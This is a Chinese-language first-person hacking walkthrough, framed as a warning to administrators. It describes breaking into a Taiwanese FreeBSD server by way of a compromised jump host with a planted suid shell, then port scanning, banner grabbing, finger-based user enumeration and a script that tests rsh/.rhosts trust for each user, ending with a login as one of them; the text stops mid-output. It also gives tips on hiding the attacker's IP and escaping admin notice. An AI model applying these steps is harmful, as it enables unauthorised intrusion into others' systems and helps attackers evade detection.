本文的写作目的仅仅是为了给某些粗心大意的网络管理人员一个警告——internet是 有趣但十分脆弱的，当你的计算机放在互联网上给人们提供信息与服务的同时，会引 来网络中的“好奇者”的窥探。而安全性与便利性是一对矛盾……在你对自己的网络 做了一个安全策略考量之后，你应该确定你愿意以多大的风险来使用一些方便的服务， 当然这些服务——比如rlogin，可能只会使你少输入一次密码……

首先是确定目标——撞大运乱挑一个吧，试试能不能成功……呵，于是登上yahoo，上 taiwan的站点小遛了一下……唔，这个还不错，我们姑且称其为www.targe.com……还 是先ping一下看看情势如何——别碰上有墙的就逊了……

C:>ping www.targe.com

Pinging www.targe.com [111.111.111.111] with 32 bytes of data:

Reply from 111.111.111.111: bytes=32 time=621ms TTL=241
Reply from 111.111.111.111: bytes=32 time=620ms TTL=241
Reply from 111.111.111.111: bytes=32 time=611ms TTL=241
Reply from 111.111.111.111: bytes=32 time=591ms TTL=241

速度还是很快的嘛……那就开始吧……

先登上某台跳板台湾的机器——这样安全一些，不会留下你自己的IP……(当然，说句 题外话——这样要追查到还不是很困难，曾经有个朋友同我说过，南方某大学一次被 黑，种种迹象都表明黑客来自美国，IP、更改后主页上留下的话语……朋友受托去补 漏查源，发现那IP是美国一个提供免费shell的服务供应商……于是申请了一个shell， 通过一系列动作成为root，查看系统日志——真相大白，IP居然指向那家大学自身)。

通过跳板还有一个好处——如果你的尝试失败，在系统日志里留下来的是台湾本土的 IP，这样的登陆失败命令比较不会引起系统管理员的注意……

C:>nc ***.***.***.*** 12345

就登上跳板了，12345端口里我预留了一个suid的shell……

好了，祭起宝刀——nmap……

# ./nmap -sT -O 111.111.111.111

Starting nmap V. 2.3BETA12 by Fyodor ([email protected], www.insecure.org/nmap/)

Interesting ports on www.targe.com (111.111.111.111):
Port  State    Protocol Service
7    open    tcp    echo
9    open    tcp    discard
19   open    tcp    chargen
21   open    tcp    ftp
23   open    tcp    telnet
25   open    tcp    smtp
37   open    tcp    time
79   open    tcp    finger
80   open    tcp    http
111   open    tcp    sunrpc
443   open    tcp    https
512   open    tcp    exec
513   open    tcp    login
514   open    tcp    shell
515   open    tcp    printer
540   open    tcp    uucp
3306  open    tcp    MySQL

TCP Sequence Prediction: Class=random positive increments
             Difficulty=55346 (Worthy challenge)
No OS matches for host (If you know what OS is running on it
…………
…………
Nmap run completed -- 1 IP address (1 host up) scanned in 17 seconds

唔，运气还不错，提供的服务不少，估计漏也少不到哪儿去……只是没判断出系统
类型，这些服务里看上去可以利用的有：

Port  State    Protocol Service

21   open    tcp    ftp
25   open    tcp    smtp
79   open    tcp    finger
80   open    tcp    http
111   open    tcp    sunrpc
512   open    tcp    exec
513   open    tcp    login
514   open    tcp    shell
540   open    tcp    uucp
3306  open    tcp    mysql

最近rpc攻击非常流行，原因之一恐怕是方便易行——只要存在漏洞，远程就可以
得到一个rootshell……甚至对计算机完全不懂的外行也能轻易实施，呵，那咱们
来看看这个111 port的sunrpc里有什么奥妙吧……

# rpcinfo -p 111.111.111.111&
21404
#  program vers proto  port service
  100000  2  tcp  111 rpcbind
  100000  2  udp  111 rpcbind

咦，看来没戏唱哦……好在还有那么多服务，待偶慢慢试来……
看看是什么Ftp服务器软件吧，说不定有远程溢出的漏洞呢

# ./nc 111.111.111.111 21
#

乖乖龙的东，什么输出也没有就关上了，这是如何一回事？

C:>ftp 111.111.111.111
Connected to 111.111.111.111.
Connection closed by remote host.

呵呵，看来过滤掉了嘛……怎么办？看看25端口是运行什么SMTP服务的吧……

# ./nc 111.111.111.111 25
220 ***-***-***-*** ESMTP Sendmail 8.9.3/8.9.3; Wed, 5 Apr 2000 08:56:59 GMT

Sendmail 8.9.3/8.9.3？好象没有什么致命的漏洞呀……

看看是什么Web服务器先……

# (echo "head /http/1.0";echo;echo)|./nc -w 3 111.111.111.111 80

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>501 Method Not Implemented</TITLE>
</HEAD><BODY>
<H1>Method Not Implemented</H1>
head to /http/1.0 not supported.<P>
Invalid method in request head /http/1.0<P>
<HR>
<ADDRESS>Apache/1.3.9 Server at ***-***-***-*** Port 80</ADDRESS>
</BODY></HTML>

阿帕奇这个版本的东东至少偶的印象中没有什么“死穴”……

好在开了finger，俺就土土地先把用户列表弄出来吧……

finger [email protected]

[www.targe.com.tw]

root
aaa
bbb
ccc
ddd

总算有点收获……，那么下一步该做什么呢？既然这台主机开了512、513、514的r
系列服务，那就值得尝试一下，说不定哪个偷懒的家伙直接在.rhosts里设了

+ username

那我就爽了……

顺手写了个shell script，让它去一个一个地尝试rsh命令，传到肉鸡上

# chmod 700 rsh.sh
# nohup ./rsh.sh www.targe.com

它会自动地在/etc/passwd和/etc/shadow里加上finger出来的用户名，然后su过去，
再对远程目标111.111.111.111执行rsh命令，成功则返回该用户名……然后将备份的
passwd和shadow再拷回去……删除临时文件，生成报告文件……(或许是我对.rhosts
的理解还有问题，有时我在机里加上+ +但rcp时还会报Permission denied或者connect
refused,所以干脆都su成用户——或许太笨;)

我便再去MUD里当我的大虾了……半个小时后回来

登上肉鸡，读取报告文件.rsh.txt

# cat ./.rsh.txt
ccc

hehe，非常抱歉，看来俺得到一个shell了……

进去看看……

# rlogin -l ccc 111.111.111.111

Last login: Fri Mar 24 19:04:50 from 202.102.2.147
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
    The Regents of the University of California. All rights reserved.

FreeBSD 3.2-RELEASE (GENERIC) #0: Tue May 18 04:05:08 GMT 1999

You have mail.

呵，原来是FreeBSD 3.2-RELEASE呀，感觉不错，进来了，看看我的权限如何吧……

> id
id
uid=10